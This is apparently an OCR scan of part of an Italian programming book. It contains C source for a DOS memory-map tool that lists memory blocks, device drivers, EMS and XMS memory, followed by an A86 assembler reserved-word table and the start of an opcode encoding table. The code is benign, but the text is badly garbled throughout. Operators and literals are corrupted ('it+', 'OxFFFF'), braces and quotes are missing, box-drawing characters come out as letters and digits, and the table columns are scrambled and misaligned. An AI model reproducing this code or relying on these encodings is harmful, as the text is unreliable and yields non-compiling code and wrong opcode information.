end=begin + m->size; 
for(i=0; i<256; it+) { 
memcpy(&ivp, MK_FP(0, i*4), 4); 
iv=((ulong)(FP_SEG(ivp) + 1) << 4) + (ulong)FP_OFF(ivp); 
if ((iv > begin) && (iv < end) && (m->vecnum < MAX_VEC)) 
m->vectors[m->vecnum++]=(uchar)i; 


} 

} 
// ------..---— 
// Name: search_sd 
// Input: MCB *mcb address of MCB block 
// Output: - 
// Notes: Searches the internal parts of a DOS data block. 
// ------.--—— 
static void search_sd(MCB *mcb) 
{ 

ushort begin, end; 


SD_HEADER *sd; 


sd=MK_FP(FP_SEG(mcb) + 1, 0); 
begin=FP_SEG(mcb); 
end=FP_SEG(mcb) + mcb->size; 
while((FP_SEG(sd) > begin) && 
(FP_SEG(sd) < end) && 
(mlistnum < MAX_ITEM)) { 
mlistnumt+; 
mlist[mlistnum].seg=sd->start; 
mlist[mlistnum].size=(ulong)sd->size << 4; 
switch(sd->type) { 
case 'D': 
case 'I'!: 
mlist[mlistnum].name[0]=' 
strncpy(&mlist[mlistnum]. name[1], sd->name, 8); 
strupr(mlist[mlistnum].name); 
mlist[mlistnum].type=MT_DEVICE; 
break; 


case 'F'!: 
strcpy(mlist[mlistnum].name, " FILES"); 
mlist[mlistnum].type=MT_DATA; 
break; 


case 'X': 
strcpy(mlist[mlistnum].name, " FCBS"); 
mlist[mlistnum].type=MT_DATA; 


break; 
case 'C': 
case 'B': 


strcpy(mlist[mlistnum].name, " BUFFERS"); 
mlist[mlistnum].type=MT_DATA; 


break; 


case 'L': 
strcpy(mlist[mlistnum].name, " LASTDRV"); 
mlist[mlistnum].type=MT_DATA; 
break; 


case 'S'!: 
strcpy(mlist[mlistnum].name, " STACKS"); 
mlist[mlistnum].type=MT_DATA; 
break; 


default: 
strcpy(mlist[mlistnum].name, " 222222"); 
mlist[mlistnum].type=MT_DATA; 
break; 


} 
sd=MK_FP(sd->start + sd->size, 0); 


} 
} 
/] -------------------------------------------------------------------------- 
// Name: check_name 
// Input: uchar *name name of MCB or device driver 
// Output: - 
// Notes: Filters name of MCBs and device drivers. 
// -------------------------------------------------------------------------- 


void check_name(uchar *name) 
ushort i; 


for(i=0; name[i]; i+t+) 


if ( name[il<"'"' ) { 

name[i] = '\0'; 

break; 

}// if 
} 
// -----.--— 
// Name: register_mcbh 
// Input: MCB *mcb address of MCB block 
// Output: - 
// Notes: Registers parameters of the given MCB block. 
// --------— 
static void register_mcb(MCB *mcb) 
{ 


mlist[mlistnum].seg=FP_SEG(mcb); 
mlist[mlistnum].owner=mcb->owner; 
mlist[mlistnum].size=(ulong)mcb->size << 4; 


if (mlist[mlistnum].seg <= 0x9FFF) { 
if (is_psp(mcb)) { 
strncpy(mlist[mlistnum].name, mcb->name, 8); 
check_name(mlist[mlistnum].name); 
strupr(mlist[mlistnum].name); 
mlist[mlistnum].environment=env_seg(mcb); 
mlist[mlistnum].type=MT_PROGRAM; 


if (!mcb->owner) { 
mlist[mlistnum].type=MT_FREE; 

} else if (mcb->owner <= 0x0008) { 
strcpy(mlist[mlistnum].name, "DOS"); 
if (!strncmp(mcb->name, "SD", 2)) { 


mlist[mlistnum].type=MT_SYSDATA; 
search_sd(mcb); 

} else if (!strncmp(mcb->name, "SC", 2)) { 
mlist[mlistnum].type=MT_SYSCODE; 
} 

else 
mlist[mlistnum].type=MT_SYSCODE; 

} 


} else { 
if (!mcb->owner) { 
mlist[mlistnum].type=MT_FREE; 
} else if (mcb->owner <= 0x0008) { 
strcpy(mlist[mlistnum].name, "DOS"); 
if (!strncmp(mcb->name, "SD", 2)) { 
mlist[mlistnum].type=MT_SYSDATA; 
search_sd(mcb); 
} else if (!strncmp(mcb->name, "SC", 2)) { 
mlist[mlistnum].type=MT_SYSCODE; 


} 

} else if (mcb->owner > 0x0008) { 
mlist[mlistnum].environment=env_seg(mcb); 
mlist[mlistnum].type=MT_PROGRAM; 
strncpy(mlist[mlistnum].name, mcb->name, 8); 
strupr(mlist[mlistnum].name); 


} 

} 
} 
// ------.--—— 
// Name: make_mcb_list 
// Input: - 
// Output: - 
// Notes: Makes the list of MCBs. 
// ------.---—— 
static void make_mcb_list(void) 
{ 


ushort i, j; 
MCB *cur_mcb; 
uchar origlink; 


memset(mlist, 0, sizeof(mlist)); 
check_memory(); 


asm mov ah, 52h 

asm int 21h 

asm mov ax,es:[bx-2] 

asm mov word ptr first _mcb[2], ax 
asm mov word ptr first_mcb,0 


if (upper_installed) { 
origlink=get_upperlink(); 
set_upperlink(1); 


cur_mcb=(MCB *)MK_FP(first_mcb, 0); 

while((mlistnum < MAX_ITEM) && (cur_mcb->type != 'Z')) { 
register_mcb(cur_mcb); 
cur_mcb=(MCB *)MK_FP(FP_SEG(cur_mcb) + cur_mcb->size + 1, 0); 
++mlistnum; 


} 


register_mcb(cur_mcb); 


cur_mcb=(MCB *)MK_FP(FP_SEG(cur_mcb) + cur_mcb->size + 1, 0); 
++mlistnum; 


if (upper_installed) 
set_upperlink(origlink); 


for(i=0; i<mlistnum; i++) 
if ( (mlist[i].seg >= 0x9000) && (mlist[i].seg <= 0xB000) && 
(mlist[i].type == MT_SYSCODE) ) { 
upper_index=i; 
break; 


} 


for(i=upper_index; i<mlistnum; i++) 
if (mlist[i].type == MT_FREE) { 
upper_free+=mlist[i].size; 
if (mlist[i].size > upper_large) 
upper_large=mlist[i].size; 


for(i=0; i<mlistnum; i+t+) { 
if (mlist[i].type == MT_PROGRAM) 
for(j=0; j<mlistnum; j++) 
if ((mlist[i].seg != mlist[j].seg) && 

(mlist[j].owner == mlist[i].segt1)) { 

strcpy(mlist[j].name, mlist[i].name); 
mlist[j].type=(mlist[i].environment == mlist[j].seg+t1) ? MT_ENV : 
MT_DATA; 


} 
if (mlist[i].type != MT_SYSDATA) 
search_vectors(&mlist[i]); 


} 
for(i=0; i<mlistnum; i++) 
if (mlist[i].seg+1 == _psp) { 
mlist[i+1].size+=mlist[i].size + 16; 
mlist[i].type=MT_MAP; 
for(j=0; j<mlistnum; j++) 
if (mlist[j].seg+1 == mlist[i].environment) { 
if (j == i-1) { 
mlist[j].type=MT_MAP; 
} else { 
mlist[j].type=MT_FREE; 
mlist[j].name[0]='\0'; 
break; 
break; 
} 
i; 
// ---------— 
// Name: make_dev_list 
// Input: - 
// Output: - 
// Notes: Makes list of device drivers. 
// ------.--— 


static void make_dev_list(void) 


ushort L, I; 
DEVICE_HEADER *cur_dev; 
DPB *cur_dpb; 


memset(dlist, 0, sizeof(dlist)); 
make_mcb_list(); 


asm mov ah, 52h 

asm int 21h 

asm add bx,22h 

asm mov word ptr first _dev[2],es 
asm mov word ptr first_dev,bx 


cur_dev=first_dev; 
while((FP_OFF(cur_dev) != OxFFFF) && 

(dlistnum < MAX_ITEM)) { 
dlist[dlistnum].addr=cur_dev; 
dlist[dlistnum].attr=cur_dev->attr; 
strncpy(dlist[dlistnum].devname, cur_dev->name, 8); 
check_name(dlist[dlistnum].devname); 
strupr(dlist[dlistnum].devname); 
cur_dev=cur_dev->next; 
++dlistnum; 


} 


for(i=0; i<dlistnum; i++) 
for(j=0; j<mlistnum; j++) 
if (mlist[j].seg == FP_SEG(dlist[i].addr)) 
strcpy(dlist[i].progname, (mlist[j].name[0] == ' ') ? 
&mlist[j].name[1] : mlist[j].name); 


asm mov ah, 52h 

asm int 21h 

asm les bx, es: [bx] 

asm mov word ptr first _dpb[2],es 
asm mov word ptr first_dpb,bx 


cur_dpb=first_dpb; 
while(FP_OFF(cur_dpb) != OxFFFF) { 
for(i=0; i<dlistnum; i++) 
if (dlist[i].addr == cur_dpb->device_addr) { 
dlist[i].drives[dlist[i].drive_num++]=cur_dpb->drive_numt'A"'; 
break; 
} 
cur_dpb=cur_dpb->next_dpb; 
} 


for(i=0; i<dlistnum; i+t+) { 
if ((dlist[i].attr & 0x8000) == 0) 
dlist[i].devname[0]='\0'; 
if (dlist[i].drive_num) { 
if (dlist[i].drive_num == 
sprintf(dlist[i].devname, "%c:", dlist[i].drives[0]); 
else 
sprintf(dlist[i].devname, "%c: - %c:", dlist[i].drives[0], 
dlist[i].drives[dlist[i].drive_num-1]); 


} 

} 
} 
// ------.----— 
// Name: normal_list 
// Input: uchar type type of list 
// Output: - 
// Notes: Displays the normal list of programs. 
// --------— 


static void normal _list(uchar type) 


ushort i, num; 
make_mcb_list(); 


puts("UAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAAAAA<" ) ; 
puts("3 mcb size name type 3); 
puts("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAA""); 
num=(upper_installed && (type == NORMAL)) ? upper_index : mlistnum; 
for(i=0; i<num; i++) 
if ((mlist[i].type == MT_SYSCODE) || 
(mlist[i].type == MT_SYSDATA) || 
(mlist[i].type == MT_FREE) || 
(mlist[i].type == MT_PROGRAM) || 
(mlist[i].type == MT_DEVICE)) 
printf("3 %04x 3 %6lu 3 %-9s 3 %-13s 3\n", 
mlist[i].seg, mlist[i].size, mlist[i].nane, 
typenames[mlist[i].type]); 


if (!ems_installed && !xms_installed && !upper_ installed) { 
puts("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAL" ) ; 
return; 


} 
puts ("ARAAARARARARARAARANANANANAARARARARARARAAAARA ") 


if (ems_installed) 
printf("3 %8lu bytes free EMS memory 3\n", ems_free); 


if (xms_installed) 
printf("3 %8lu bytes free XMS memory 3\n", xms_free); 


if (upper_installed) 
printf("3 %8lu bytes free upper memory 3\n", upper_free); 


puts ("ARAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAÙ"); 


// --------— 
// Name: full_list 

// Input: - 

// Output: - 

// Notes: Displays full list of memory blocks. 

// ------.--—— 


static void full _list(void) 


ushort i, j, pos; 
uchar line[81]; 


make_mcb_list(); 


puts("UAAAAAAAAAAAAAAAARAARAAARARARARARARARARARAKRARARARARARKAKARAAAARARARAKRARAAAAAA<, 
"); 
puts("3 mcb size name type interrupt vectors 


3"); 
puts("ARAAAAAAAAAAAAAAARAAAAAAAAAAARARAAARARARARARAKARARAAARARAKAKAKAKAKAAAAAAA 
" : 

for(i=0; i<mlistnum; i++) 


if (mlist[i].type != MT_MAP) { 
sprintf(line, "3 %04x 3 %6lu 3 %-9s 3 %-4s 3 


mlist[i].seg, mlist[i].size, mlist[i].nane, 
typenames[mlist[i].type]); 
for(j=1, pos=46; j<=mlist[i].vecnum; j++) { 
sprintf(&line[pos], "%02x", (int)mlist[i].vectors[j-1]); 
line[pos+2]=' '; 
if (!(j % 9) && ((j+1) <= mlist[i].vecnum)) { 
puts(line); 
strcpy(line, "3 $ i; 3 3 
3"); 
pos=46; 
} else { 
pos+=3; 


} 


} 
puts(line); 


puts("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAU 


"); 
} 


// -----..--— 
// Name: device_list 

// Input: - 

// Output: - 

// Notes: Display the list of device drivers. 

// ------.---— 
static void device _list(void) 

{ 


ushort i, num; 
make_dev_list(); 
puts("OARAAAAAAAAAAAAAARAARAAAAAAAAAAAAAAAKKAKA") ; 
for(i=0; i<dlistnum; i++ 
printf("3 %Fp 3 %04x 3 %-8s 3 %-8s 3\n", 
dlist[i].addr, dlist[i].attr, dlist[i].devname, 
dlist[i].progname); 


puts ("ARAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAL"); 


} 

// -----.--— 
// Name ems_list 

// Input - 

// Output - 

// Notes Displays the EMS report 

// -----.--— 
static void ems_list(void) 

{ 


ushort i; 

uchar *line, numstr[20]; 
uchar handlename[9]; 
check_ems(); 


puts("OAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; "); 


if (!ems_installed) { 


puts("3 EMS driver not installed in system. 3"); 
} else { 
line="3 EMS driver version Ma 
sprintf(numstr, "%1i.%1i", (int)ems_vermajor, (int)ems_verminor); 
strncpy(&line[22], numstr, strlen(numstr)); 
puts(line); 


line="3 EMS page frame Hr 
sprintf(numstr, "%04xX", ems_frame); 
strncpy(&line[22], numstr, strlen(numstr)); 
puts(line); 


line="3 Total EMS memory Sp 
sprintf(numstr, "%lu bytes", ems_size); 
strncpy(&line[22], numstr, strlen(numstr)); 
puts(line); 


line="3 Free EMS memory SEE 
sprintf(numstr, "%lu bytes", ems_free); 
strncpy(&line[22], numstr, strlen(numstr)); 
puts(line); 


line="3 Total handles Sh 
sprintf(numstr, "%u", ems_totalhandle); 
strncpy(&line[22], numstr, strlen(numstr)); 
puts(line); 


line="3 Free handles da 
sprintf(numstr, "%u", ems_freehandle); 
strncpy(&line[22], numstr, strlen(numstr)); 
puts(line); 


puts("3 3"); 
puts("3 Handle Pages Size Name SA 
puts("3 AAAAAAAAAAAAAAAAAKAKAKRAKAAAAAAAAAKAA 3"); 
for(i=0; i<ems_usehandle; i++) { 
memset(handlename, 0, sizeof(handlename)); 
if (ems_vermajor >= 4) { 
if (ems_handles[i].handle == 0) { 
strcpy(handlename, "SYSTEM"); 
} else { 
asm push di 
_DX=ems_handles[i].handle; 
_ES=FP_SEG(&handlename); 
_DI=FP_0FF(&handlename); 
asm mov ax,5300h 
asm int 67h 
asm pop di 


strupr(handlename); 
} 
printf("3 %-7u %-6u %-9lu %-9s 3\n", 


ems_handles[i].handle, ems_handles[i].pages, 
(ulong)ems_handles[i].pages * 16384L, handlename); 


// Output: - 


// Notes: Displays the XMS report. 
// ------.-- 
static void xms_list(void) 
{ 
ushort i; 


uchar *line, numstr[20]; 
make_mcb_list(); 


if (xms_installed) { 

printf("Testing XMS memory ..."); 
memset(xms_handles, 0, sizeof(xms_handles)); 
xms_usehandle=0; 
for(i=0; i<65535; it+) { 

asm mov ah, 0Eh 

_DX=i; 

(*xms_drv)(); 

asm or ax, ax 

asm jnz found 

continue; 


_found: 
asm mov byte ptr xms_freehandle, bl 
if (xms_usehandle < MAX_HANDLE) { 
asm push di 
_ES=FP_SEG(&xms_handles); 
_DI=FP_0FF(&xms_handles); 
asm mov ax,xms_usehandle // 
xms_handles[xms_usehandle].handlez=i; 
asm mov cl,3 
asm shl ax,cl 
asm add di, ax 
asm mov ax,i 
asm mov es:[di],ax 


asm mov es:[di+2],dx // 
xms_handles[xms_usehandle].size= DX; 
asm mov es:[di+6],bh // 


xms_handles[xms_usehandle].locks=_BH; 
asm pop di 
xms_handles[xms_usehandle].size*=1024L; 
xms_usehandle++; 


} 


} 
printf("\r"); 
} 


puts ("OAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; "); 


if (!xms_installed) { 


puts("3 XMS driver not installed in system. sio E 
} else { 
line="3 XMS driver version dia 


sprintf(numstr, "%i.%i", (ushort)xms_vermajor, (ushort)xms_verminor); 
strncpy(&line[26], numstr, strlen(numstr)); 
puts(line); 


line="3 HMA state Sue 
sprintf(numstr, "%s", (xms_hma) ? "exists" : "not exists"); 
strncpy(&line[26], numstr, strlen(numstr)); 

puts(line); 


line="3 A20 line state ola 


sprintf(numstr, "%s", (xms_a20) ? "enabled" : "disabled"); 
strncpy(&line[26], numstr, strlen(numstr)); 
puts(line); 


line="3 Free XMS memory SIE 
sprintf(numstr, "%lu bytes", xms_free); 
strncpy(&line[26], numstr, strlen(numstr)); 
puts(line); 


line="3 Largest free XMS block sy 
sprintf(numstr, "%lu bytes", xms_largest); 
strncpy(&line[26], numstr, strlen(numstr)); 
puts(line); 


line="3 Free handles Ma 
sprintf(numstr, "%u", xms_freehandle); 
strncpy(&line[26], numstr, strlen(numstr)); 
puts(line); 


if (xms_usehandle) { 
puts("3 I) 
puts("3 Block Handle Size Locks Se 
puts("3 AAAAAAAAAAAAAAAAARAAAKAAAAAAAKAARABARARAK 3"); 
for(i=0; i<xms_usehandle; i++) 
printf("3 %-6U %-7u %-9lu %-12u 3\n", 
i, xms_handles[i].handle, xms_handles[i].size, 
xms_handles[i].locks); 


} 
puts("* sj 
if (upper_installed) { 

line="3 Free upper memory qu. 


sprintf(numstr, "%lu bytes", upper_free); 
strncpy(&line[26], numstr, strlen(numstr)); 
puts(line); 

line="3 Largest upper block Sr 
sprintf(numstr, "%lu bytes", upper_large); 
strncpy(&line[26], numstr, strlen(numstr)); 
puts(line); 


} else { 
puts("3 Upper memory not available 5"); 
} 
puts("ARAAAAAAAAAAAAAAARAARAAAAAAAAARAAAAAKKARAL" ) ; 
} 
// Mainrazazazianrs senta iena anale lieta 


int main(int argc, char *argv[]) 


ushort i; 


if (argc > 1) { 
for(i=1; i<argc; i++) { 


if ((argv[i][0] == '-') II (argv[i][0] == '/')) 
switch( argv[i][1] ) { 
case 'n'!: 
case 'N': 
normal_list(NORMAL); 
break; 


case 'u': 


case 'U': 
normal_list(UPPER); 
break; 


case 'f': 

case 'F': 
full_list(); 
break; 


case 'd': 

case 'D': 
device_list(); 
break; 


case 'e': 

case 'E': 
ems_list(); 
break; 


case 'x': 

case 'X': 
xms_list(); 
break; 


case 'h': 

case 'H': 

case '?': 
puts(USAGE); 
return 0; 


default: 
printf("Invalid option %s (use -h for help).\n", argv[i]); 
return 1; 


else { 
printf("Invalid option %s (use -h for help).\n", argv[i]); 
return 1; 


} 


} 
} else { 
normal_list(NORMAL); 
} 


return 0; 


La seguente è una tabella riportante i simboli riservati dell’assembler dei 
sistemi x86. 


Reserved Symbols of the A86 Assembler 


AAA ASCII adjust addition ELSEIF Conditional term 

AAD ASCII adjust division END Ignored for compatibility 
AAM ASCII adjust multiply ENDIF Conditional term 

AAS ASCII adjust subtract ENDP Ignored for compatibility 
ADC Add with carry ENDS End of segment 

ADD Instruction ENTER Instruction 

AH Byte register EQ Equals operator 

AL Byte register EQU Equate directive 

AND Instruction/operator ES Segment register 


ASSUME Ignored for compatibility EVEN Coerce to even address 


AX Word register EXTRN Ignored for compatibility 


B Byte memory specifier F Far specifier 

BH Byte register F2XM1 87 Instruction 
BIT Bit-mask operator FABS 87 Instruction 
BL Byte register FADD 87 Instruction 
BOUND Instruction FADDP 87 Instruction 
BP Word register FAR Far specifier 

BX Word register FBLD 87 Instruction 
BY Bytes-combine operator FBSTP 87 Instruction 
BYTE Byte memory specifier FCHS 87 Instruction 
CALL Instruction FCLEX 87 Instruction 
CBW Convert byte to word FCOM 87 Instruction 
CH Byte register FCOMP 87 Instruction 
CL Byte register FCOMPP 87 Instruction 
CLC Clear carry FDECSTP 87 Instruction 
CLD Clear direction FDISI 87 Instruction 
CLI Clear interrupt FDIV 87 Instruction 
CMC Complement carry FDIVP 87 Instruction 
CMP Compare FDIVR 87 Instruction 
CMPS Compare string FDIVRP 87 Instruction 
CMPSB Compare string byte FENI 87 Instruction 
CMPSW Compare string word FFREE 87 Instruction 
CODE Segment name FIADD 87 Instruction 
COMMENT Directive FICOM 87 Instruction 
cs Segment register FICOMP 87 Instruction 
CWD Convert word dword FIDIV 87 Instruction 
Cx Word register FIDIVR 87 Instruction 

D Dword specifier FILD 87 Instruction 
DAA Decimal adjust add FIMUL 87 Instruction 
DAS Decimal adjust sub FINCSTP 87 Instruction 
DATA Segment name FINIT 87 Instruction 
DB Define bytes FIST 87 Instruction 
DD Define dwords FISTP 87 Instruction 
DEC Decrement FISUB 87 Instruction 
DH Byte register FISUBR 87 Instruction 
DI Word register FLD 87 Instruction 
DIV Divide FLD1 87 Instruction 
DL Byte register FLDCW 87 Instruction 
DQ Define Qwords FLDENV 87 Instruction 
DS Segment register FLDL2E 87 Instruction 
DT Define Twords FLDL2T 87 Instruction 
DUP Duplicate operator FLDLG2 87 Instruction 
DW Define words FLDLN2 87 Instruction 
DWORD Memory specifier FLDPI 87 Instruction 
DX Word register FLDZ 87 Instruction 
ELSE Conditional term FMUL 87 Instruction 
FMULP 87 Instruction IL Jump on less 
FNCLEX 87 Instruction JLE Jump less equal 
FNDISI 87 Instruction JMP Jump unconditional 
FNENI 87 Instruction JNA Jump not above 
FNINIT 87 Instruction JINAE Jump not above equal 
FNOP 87 Instruction JNB Jump not below 
FNSAVE 87 Instruction JINBE Jump not below equal 
FNSTCW 87 Instruction JNC Jump not carry 
FNSTENV 87 Instruction JNE Jump not equal 
FNSTSW 87 Instruction JNG Jump not greater 
FPATAN 87 Instruction JNGE Jump not greater equ 
FPREM 87 Instruction JINL Jump not less 
FPTAN 87 Instruction JINLE Jump not less equal 
FRNDINT 87 Instruction JNO Jump not overflow 
FRSTOR 87 Instruction JNP Jump not parity 
FSAVE 87 Instruction JINS Jump not sign 
FSCALE 87 Instruction JINZ Jump not zero 
FSETPM 87 Instruction Jo Jump overflow 
FSQRT 87 Instruction JP Jump parity 

FEST 87 Instruction JPE Jump parity even 
FSTCW 87 Instruction JPO Jump parity odd 
FSTENV 87 Instruction IS Jump on sign 
FSTP 87 Instruction IZ Jump on zero 
FSTSW 87 Instruction LABEL Declaration 

FSUB 87 Instruction LAHF Load AH flags 
FSUBP 87 Instruction LDS Load into DS 
FSUBR 87 Instruction LE Less equal operator 
FSUBRP 87 Instruction LEA Load eff address 
FTST 87 Instruction LEAVE Instruction 
FWAIT 87 Instruction LES Load into ES 


FXAM 87 Instruction LOCK Instruction 


FXCH 
FXTRACT 
FYL2X 
FYL2XP1 
GE 


INC 
INCLUDE 
INS 
INSB 
INSW 
INT 
INTO 
IRET 


PUBLIC 
PUSH 
PUSHA 
PUSHF 


Q 
QWORD 
RADIX 
RCL 
RCR 
REP 
REPE 
REPNE 
REPNZ 
REPZ 
RET 
RETF 
ROL 
ROR 
SAHF 
SAL 
SAR 
SBB 
SCAS 
SCASB 
SCASW 
SEGMENT 
SHL 
SHORT 


87 Instruction 

87 Instruction 

87 Instruction 

87 Instruction 
Greater/equal operator 
Greater than operator 
High byte of word op 
Halt i 
Integer divide 
Skip/conditional term 
Integer multiply 
Input from port 
Increment 

Ignored for compatibility 
Input string 

Input string byte 
Input string word 
Interrupt 

Interrupt on overflow 
Interrupt return 

Jump on above 

Jump above equal 

Jump on below 

Jump below equal 

Jump on carry 

Jump on CX zero 

Jump on equal 

Jump on greater 

Jump greater equal 


Output String 

Output string byte 
Output string word 
Ignored for compatibility 
Instruction 

Pop all 

Pop flags 

Procedure Directive 
Ignored for compatibility 
Ignored for compatibility 
Instruction 

Push all 

Push flags 

Qword specifier 
Memory specifier 
Directive 

Rotate carry left 
Rotate carry right 
Repeat prefix 

Repeat while equal 
Repeat not equal 
Repeat while zero 
Repeat non zero 
Return 

Far Return 

Rotate left 

Rotate right 

Store AH to flags 
Shift arith left 
Shift arith right 
Subtract with borrow 
Scan string 

Scan string byte 
Scan string word 
Directive 
Instruction/operator 
Operator 


LODS 
LODSB 
LODSW 
LONG 
LOOP 
LOOPE 
LOOPNE 
LOOPNZ 
LOOPZ 
LOW 
LT 
MACRO 
MOD 
MOV 
MOVS 
MOVSB 
MOVSW 
MUL 
NAME 
NE 
NEAR 
NEG 
NIL 
NOP 
NOT 
OFFSET 
OR 
ORG 
OUT 


XCHG 
XLAT 
XLATB 
XOR 


Load string 

Load string byte 
Load string word 
Operator 
Instruction 

Loop on equal 

Loop not equal 

Loop not zero 

Loop on zero 
Operator 

Less than operator 
Directive 
Operator 
Instruction 
Move string 

Move string byte 
Move string word 
Multiply 

Ignored for compatibility 
Not equals operator 
Operator 

Instruction 

No code instruction 
No operation 
Instruction/operator 
Operator 
Instruction/operator 
Directive 
Output to port 


Instruction 
Translate byte 
Translate byte 
Instruction/operator 


SHR Instruction/operator 

SI Word register 

SP Word register 

SS Segment register 

ST EQU 0 for compatibility 
STC Set carry 

STD Set direction 

STI Set interrupts 

STOS Store string 

STOSB Store string byte 

STOSW Store string word 

STRUC Structure directive 

SUB Instruction 

SUBTTL iIgnored for compatibility 
T Tword specifier 

TEST Instruction 

THIS This-location specifier 
TITLE Ignored for compatibility 
TWORD Memory specifier 

TYPE Operator 

W Word specifier 

WAIT Instruction 

WORD Word specifier 


La seguente tabella mostra la codifica delle istruzioni utilizzando un 
metodologia. 


* EXPLANATION OF THE NOTATION USED IN THE HEX TABLE * 


Symbol 


r8 
rm8 


Explanation 


Indicates a byte register operand 
Indicates a byte reg/mem operand 


altra 


m8 Indicates a byte memory operand 

i8 Indicates a byte immediate operand 

r16 Indicates a word register operand 

rm16 Indicates a word reg/mem operand 

m16 Indicates a word memory operand 

116 Indicates a word immediate operand 

rel8 Indicates a byte relative offset operand (see 'cb') 
rel16 Indicates a word relative offset operand (see 'cw') 


ptr16:16Indicates an immediate far pointer operand (see 'cd') 
m16:16 Indicates a memory far pointer operand 
m16&16 Indicates two words in memory (for BOUND) 


/1 etc. Indicates that the 'Reg' field of the RegInfo byte contains 
this number as opcode information 


+rb Indicates that the 'Reg' value of the first byte register 
operand is added to the opcode 

+rw Indicates that the 'Reg' value of the first word register 
operand is added to the opcode 

/r Indicates a RegInfo byte (maps to register or memory 
operands) 

ib Indicates a byte of data (maps to an i8 operand) 

iw Indicates a word of data (maps to an i16 operand) 

ch Indicates a relative offset from the next instruction for 
JMP, CALL etc. (signed with segment wrap, one byte) 

cw Indicates a relative offset from the next instruction for 
JMP, CALL etc. (unsigned with segment wrap, two bytes) 

cd Indicates an absolute far pointer for JMP, CALL etc. 


(signed, four bytes) 


Structure of the RegInfo byte: 


Field Mode Reg Reg/Mem 


Bits 76543210 
Byte regs: ALCLDLBLAHCHDHBH 
Word regs: AXCXDXBXSPBPSIDI 
Reg value: 01234567 


* EXPLANATION OF THE NOTATION USED IN THE OCTAL TABLE * 


Symbol Explanation 


r8 Indicates a byte register operand 

rm8 Indicates a byte reg/mem operand 

m8 Indicates a byte memory operand 

i8 Indicates a byte immediate operand 

r16 Indicates a word register operand 

rm16 Indicates a word reg/mem operand 

m16 Indicates a word memory operand 

116 Indicates a word immediate operand 

rel8 Indicates a byte relative offset operand (see 'cb') 
rel16 Indicates a word relative offset operand (see 'cw') 


ptr16:16Indicates an immediate far pointer operand (see 'cd') 
m16:16 Indicates a memory far pointer operand 
m16&16 Indicates two words in memory (for BOUND) 


t Indicates the 'Mode' field of the RegInfo byte, which is 
2 bits and is always the first octal digit 
r Indicates the 'Reg' field of the RegInfo byte, which is 
3 bits and is the second octal digit (may not be present) 
m Indicates the 'Reg/Mem' field of the RegInfo byte, which 
is 3 bits and is the third octal digit 
ib Indicates a byte of data (maps to an i8 operand) 
iw Indicates a word of data (maps to an i16 operand) 
ch Indicates a relative offset from the next instruction for 
JMP, CALL etc. (signed with segment wrap, one byte) 
cw Indicates a relative offset from the next instruction for 
JMP, CALL etc. (unsigned with segment wrap, two bytes) 
cd Indicates an absolute far pointer for JMP, CALL etc. 


(unsigned, four bytes) 


Structure of the RegInfo byte: 


Field 
Bits 


Digit 


Byte regs: 
Word regs: 


Reg value: 


Mode 


Reg Reg/Mem 


76543210 


1st 


2nd 


3rd 


ALCLDLBLAHCHDHBH 
AXCXDXBXSPBPSIDI 


01234567 


ModeReg/MemOctalMeaning 


00 000 
001 
010 
011 
100 
101 
110 
111 


01 000 
001 
010 
011 
100 
101 
110 
111 


10 000 
001 
010 
011 
100 
101 
110 
111 


11 000 
001 
010 
011 
100 
101 
110 
111 


disp8, disp16: memory offset or displacement, disp8 


oro 
ori 
0r2 
0r3 
0r4 
or5 
ore 
0r7 


1ro 
1ri 
1r2 
1r3 
1r4 
1r5 
1r6 
1r7 


2r0 
2r1 
2r2 
2r3 
2r4 
2r5 
2r6 
2r7 


3ro 
3ri1 
3r2 
3r3 
3r4 
3r5 
3r6 
3r7 


[BX + SI] 

[BX + DI] 

[BP + SI] 

[BP + DI] 

[SI] 

[DI] 

disp16 

[BX] 

[BX + SI + disp8] 
[BX + DI + disp8] 
[BP + SI + disp8] 
[BP + DI + disp8] 
[SI + disp8] 

[DI + disp8] 

[BP + disp8] 

[BX + disp8] 

[BX + SI + disp16] 
[BX + DI + disp16] 
[BP + SI + disp16] 
[BP + DI + disp16] 
[SI + disp16] 

[DI + disp16] 

[BP + disp16] 

[BX + disp16] 

AL / AX 

CL / CX 

DL / DX 

BL / BX 

AH / SP 

CH / BP 

DH / SI 

BH / DI 


byte, 


which will follow the /r byte but precede any ib/iw bytes 


- --* THE ASSEMBLY TABLE -- IN HEX *--- 


Instruction 


ADC AL, i8 
ADC AX, 116 


Opcode/Data 


ADC 
ADC 
ADC 
ADC 
ADC 
ADC 
ADC 
ADD 
ADD 
ADD 
ADD 


disp16 


r8,rm8 
r16,rm16 
rm8,r8 
rm16,r16 
rm8,i8 
rm16,i8 
rm16, 116 
AL, i8 
AX, 116 
r8,rm8 
r16,rm16 


word 


/r 
/r 
/r 
/r 
/2 
/2 
/2 
ib 
iw 
/r 
/r 


ib 
ib 
iw 


ADD 
ADD 
ADD 
ADD 
ADD 
AND 
AND 
AND 
AND 
AND 
AND 
AND 
AND 
AND 
BOUN 
CALL 
CALL 
CALL 
CALL 
CBW 
CLC 
CLD 
CLI 
CMC 
CMP 


CMP 
CMP 
CMP 
CMP 
CMP 
CMP 
CMP 
CMP 
CMPS 
CMPS 
CWD 
DAA 
DAS 
DEC 
DEC 
DEC 
DIV 
DIV 
ENTE! 
HLT 


rm8,r8 
rm16,r16 
rm8, i8 
rm16,i8 
rm16, 116 
AL, i8 
AX, 116 
r8,rm8 
r16,rm16 
rm8,r8 
rm16,r16 
rm8, i8 
rm16,i8 
rm16, 116 
D r16,m16&16 
rel16 
FAR ptr16:16 
rm16 
FAR m16:16 


AL, i8 


AX, 116 
r8,rm8 
r16,rm16 
rm8,r8 
rm16,r16 
rm8,i8 
rm16,1i8 
rm16, 116 
B 

W 


r16 
rm8 
rm16 
rm8 
rm16 
R i16,i8 


IDIV rm8 
IDIV rm16 


IMUL 
IMUL 
IMUL 
IMUL 


rm8 

rm16 
r16,rm16,1i16 
